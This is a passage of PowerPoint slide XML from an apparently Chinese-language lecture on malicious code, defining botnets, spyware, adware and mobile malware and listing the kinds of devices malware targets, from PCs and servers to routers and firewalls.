          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>僵尸网络（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：是由C&amp;C服务器以及僵尸牧人控制的僵尸网络。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>间谍软件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：间谍软件就是能偷偷安装在受害者电脑上并收集受害者的敏感信息的软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>广告软件（ Adware）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：自动生成（呈现）广告的软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>移动恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>：在移动设备上产生。</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恶意代码目标</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3982085" y="5902960"/>
            <a:ext cx="3728085" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="内容占位符 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1074420"/>
            <a:ext cx="6005195" cy="5012055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="121920" tIns="60960" rIns="121920" bIns="60960" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>个人计算机</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>移动智能终端</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="0" lvl="1" indent="-436880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>手机、平板等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>智能设备</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="0" lvl="1" indent="-436880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特斯拉汽车、智能家居、智能手表等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>通信设备</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="0" lvl="1" indent="-436880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路由器、交换机等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>安全设备等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="0" lvl="1" indent="-436880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防火墙、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="内容占位符 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7710170" y="1074420"/>
            <a:ext cx="4057650" cy="4674870"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="121920" tIns="60960" rIns="121920" bIns="60960" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击目标范围：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2665" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
